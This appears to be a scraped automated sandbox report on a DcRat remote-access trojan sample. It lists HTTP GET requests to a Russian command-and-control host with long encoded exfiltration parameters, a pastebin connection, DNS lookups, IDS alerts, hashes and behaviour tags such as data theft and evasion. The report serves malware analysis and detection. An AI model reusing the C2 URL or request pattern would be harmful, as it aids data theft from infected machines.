kDMzYTM5ATNiwiIhljNklTO2YmYlF2YmZmZ5MmZxQTYlBzYyIWOyMmYmZTZyIDN4MTNwIiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	text	104 b	unknown
2104	SearchFilterHost.exe	GET	—	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&9833d94f21f6fee5636ec88fd3ca2a19=0VfiEFWrZ1RklnRHRmeClmYwR2VkNnQGlEdBNFVCJ0UOd3bq10dvRVT4F0QOlXQq1kdjRVT2lkeXJiOiEzN1IzN5IzNjRWZmJWM5IWYxIjMzQTY3kDMzYTM5ATNiwiI3gzM5UTM2QDZhhzNjZTN5EmY1MGNhhDMmhTO0IDZ5gTNlZWY4AzY1IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	—	—	unknown
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&bbaf085ad9ea9a062f6fa1d50505645c=d1nIhRTYmhTZ5E2M3gDOjFmN0EmYmFjZ0IzYkFGNmRTN5gjY0ATM1IjY0IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W&82950ec304dfd0d8b1a927403a3b2069=QX9JiI6ISM3UjM3kjM3MGZlZmYxkjYhFjMyMDNhdTOwMjNxkDM1ICLiEGNhZGOllTYzcDO4MWY2QTYiZWMmRjMjRWY0YGN1kDOiRDMxUjMiRjI6IyMyMmNkZmYmdTMxQWYwQWO0kzN1EzM1QzNlZjYzY2YhJCLigTMjhDZ4Q2N1ITZ0cDN0EWZwMDMhRjYiJGNyIjN5IWMiZzYiFWOlRjI6ICZhdTYwQWN1QWM3MTN0ITOxUTZ5YjZiJjNwETNmVTYwIyes0nIRZWOKlHUp9maJBTSy4EbKJTWsZkeZFTTq50djRkW1UkeZlGaqp1aSpmTt5EVNpXVt1UMFpnTyUERP1Ga65ENJNETphjaJZTSD1ENRdlTrJ1RNhXQq1UMnR1Ts50VZtGZqp1dVd0TsZ0VNhmT65keZR0TtpFROVTREp1MBRVTpdXaJdXSp9UaJdkTy0kMOhmSXpFbSdUTrZVbahmR6lFNRpmTtpFRPhmSXlVeJRkW1kkaNlmV65EaoRVTspUbJdDcqlEaShVWFJFSlxmSDxUMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEcNRUSuVzVhdnQYpFMOZUSwUERJNnVHpldxUUSyE0UlNHbXJGaaVUSwkFRl9WQpVWSkVUTzQTaNdWQFlkVCFTUnFERNBTWUxUMrdUSwBTRW9WVtNmdOVUSwlkRLNnVHRWdstWS2k0UaRnRtRlVCFTUpdXaJBXRww0ToNUS5Z1RkdnRHplQCl3Yqx2RhdnRtNGSCNVUIplRJtmSYl1a1cVWw4EbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXSD10dJpGTzsmaMRzZqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEzN1IzN5IzNjRWZmJWM5IWYxIjMzQTY3kDMzYTM5ATNiwiI4ADNzYTY3AjZjdjZkZmNyY2YwIjNiZGOyQDN2QDM0QDN2UWZ1YTY5IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	text	104 b	unknown
2104	SearchFilterHost.exe	GET	200	141.8.192.6:80	http://a0917852.xsph.ru/L1nc0In.php?9qYevmpgZouxy9rNFfyFTLKWeDPgjR=OJxz&6be9654e057e53ad44b92f1b1e180352=kVTYmFTN4EzMwQjZkN2MiNWNzIzYiV2Y4QDMxUjZ1UDZhVGMzQ2M4QjMzUzNxgTMzITN4QzM&37e1d955f258ef422616e4d7f6996550=gMwYmN4QTY0kTZ5ETM1QjYkZjZzMDNmVmNjFDOjRTZ1UWMzEjM5MmY&bbaf085ad9ea9a062f6fa1d50505645c=d1nIhRTYmhTZ5E2M3gDOjFmN0EmYmFjZ0IzYkFGNmRTN5gjY0ATM1IjY0IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W&82950ec304dfd0d8b1a927403a3b2069=QX9JiI6ISM3UjM3kjM3MGZlZmYxkjYhFjMyMDNhdTOwMjNxkDM1ICLiEGNhZGOllTYzcDO4MWY2QTYiZWMmRjMjRWY0YGN1kDOiRDMxUjMiRjI6IyMyMmNkZmYmdTMxQWYwQWO0kzN1EzM1QzNlZjYzY2YhJCLigTMjhDZ4Q2N1ITZ0cDN0EWZwMDMhRjYiJGNyIjN5IWMiZzYiFWOlRjI6ICZhdTYwQWN1QWM3MTN0ITOxUTZ5YjZiJjNwETNmVTYwIyes0nIRZWOKlHUp9maJBTSy4EbKJTWsZkeZFTTq50djRkW1UkeZlGaqp1aSpmTt5EVNpXVt1UMFpnTyUERP1Ga65ENJNETphjaJZTSD1ENRdlTrJ1RNhXQq1UMnR1Ts50VZtGZqp1dVd0TsZ0VNhmT65keZR0TtpFROVTREp1MBRVTpdXaJdXSp9UaJdkTy0kMOhmSXpFbSdUTrZVbahmR6lFNRpmTtpFRPhmSXlVeJRkW1kkaNlmV65EaoRVTspUbJdDcqlEaShVWFJFSlxmSDxUMvpWSwY1MixWMXFWVChlWshnMVl2dplEbahVYw40VRl2bqlkeWhEZoJ1MVVjUYFmMsdEZqZ0aJNXSpNGbkdVW1Z0VUdGMXlVekJjY5JEbJZTS5RmdS1mYwRmRWRkRrl0cJlGVp9maJRnRykVaWJjV6xWbJNXSTdVavpWSsVjMi9mQzIWeOdVYO5EWhl2dplEcNRUSuVzVhdnQYpFMOZUSwUERJNnVHpldxUUSyE0UlNHbXJGaaVUSwkFRl9WQpVWSkVUTzQTaNdWQFlkVCFTUnFERNBTWUxUMrdUSwBTRW9WVtNmdOVUSwlkRLNnVHRWdstWS2k0UaRnRtRlVCFTUpdXaJBXRww0ToNUS5Z1RkdnRHplQCl3Yqx2RhdnRtNGSCNVUIplRJtmSYl1a1cVWw4EbJZTSTpFdG1GVWJUMSl2dplkWKl2TpRzVhRnUXFles1WSzlUaJZTS5JlQSxWSzl0QkBnSFlUeNRUSzZUbiZHbyMmeW1mW2pESVd2YElkekNjYrVzVhhlSp9UaJhlWXVzVhhlSDxUOKlmYwhXbjxmSwwEbCNjY5ZFWSl2bqlEb1IjY2Y1ViBnUul0cJNUT3FERNdXQqlkNJNkYoJ1MjZnQul0cJNVZ1Z0VilnVyI1ZwMUSrZ1Vh1GbykFbCNzYnF1Mi9kSp9Uaj12Y2p0QMlWTE5ENZpGT0c3QPRTRU1UdBRlTp9maJpWOHJWa3lWSGJ1aJZTSTVWeS5mYxkjMZl2dplEbONzYsh2aJZTSpJmdsJjWspkbJNXSpJGcGdFVnBzVZdWUuNWMaJTY1ZUbjdkSp9UarhEZw5UbJNXSD10dJpGTzsmaMRzZqxUMRpWS2k0QjBnS5VmNJlnYtVzVTdHbrl0cJlmYwFzRahmSp9UaVdlYoVzajxmTYZVa3lWSEJkVMNlVwUlVKl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiEzN1IzN5IzNjRWZmJWM5IWYxIjMzQTY3kDMzYTM5ATNiwiI4ADNzYTY3AjZjdjZkZmNyY2YwIjNiZGOyQDN2QDM0QDN2UWZ1YTY5IiOiMjMjZDZmJmZ3ETMkFGMklDN5cTNxMTN0cTZ2I2MmNWYiwiI4EzY4QGOkdTNyUGN3QDNhVGMzATY0ImYiRjMyYTOiFjY2MmYhlTZ0IiOiQWY3EGMkVTNkFzNzUDNykTM1UWO2YmYyYDMxUjZ1EGMis3W	unknown	text	104 b	unknown

Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID	Process	IP	Domain	ASN	CN	Reputation
4	System	192.168.100.255:138	—	—	—	whitelisted
4	System	192.168.100.255:137	—	—	—	whitelisted
1080	svchost.exe	224.0.0.252:5355	—	—	—	unknown
2104	SearchFilterHost.exe	104.20.68.143:443	pastebin.com	CLOUDFLARENET	—	unknown
2104	SearchFilterHost.exe	141.8.192.6:80	a0917852.xsph.ru	Sprinthost.ru LLC	RU	unknown

DNS requests

Domain	IP	Reputation
pastebin.com	104.20.68.143 172.67.34.170 104.20.67.143	shared
a0917852.xsph.ru	141.8.192.6	unknown

Threats

PID	Process	Class	Message
1080	svchost.exe	Misc activity	ET INFO Observed DNS Query to xsph .ru Domain
2104	SearchFilterHost.exe	A Network Trojan was detected	ET MALWARE DCRAT Activity (GET)

2 ETPRO signatures available at the full report

Add for printing

No debug info

General Info

DcRat.exe

69E82C4A63266D58C4AC4E600BB5B0FD

C30BE7BDC9E9FD41484B957E0DC68446130BD7B4

147C37CC627DC68B9CDE63FE6509C5C1D3E923DEA1DDE6EFBCBD3AE2C84E0814

98304:HFrKdV6f5iv+3d5o1a7TSJALPOS8Nazxw4lADAu440GdKLL5PQU4xZekFeYqEfZe:HBx

Software environment set and analysis options

Launch configuration

Software preset

Behavior activities

MALICIOUS

Drops the executable file immediately after the start

Uses sleep, probably for evasion detection (SCRIPT)

DCRAT has been detected (SURICATA)

Actions looks like stealing of personal data

Connects to the CnC server

SUSPICIOUS

Reads security settings of Internet Explorer

Reads the Internet Settings

Executable content was dropped or overwritten

The process executes VB scripts

Executing commands from a ".bat" file

Starts CMD.EXE for commands execution

Runs shell command (SCRIPT)

The process creates files with name similar to system file names

Executed via WMI

Probably delay the execution using 'w32tm.exe'

Reads settings of System Certificates

INFO

Reads the computer name

Checks supported languages

Reads the machine GUID from the registry

Reads Environment values

Reads product name

Creates files in the program directory

Create files in a temporary directory

Reads the software policy settings

Malware configuration

Static information

TRiD

EXIF

EXE

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings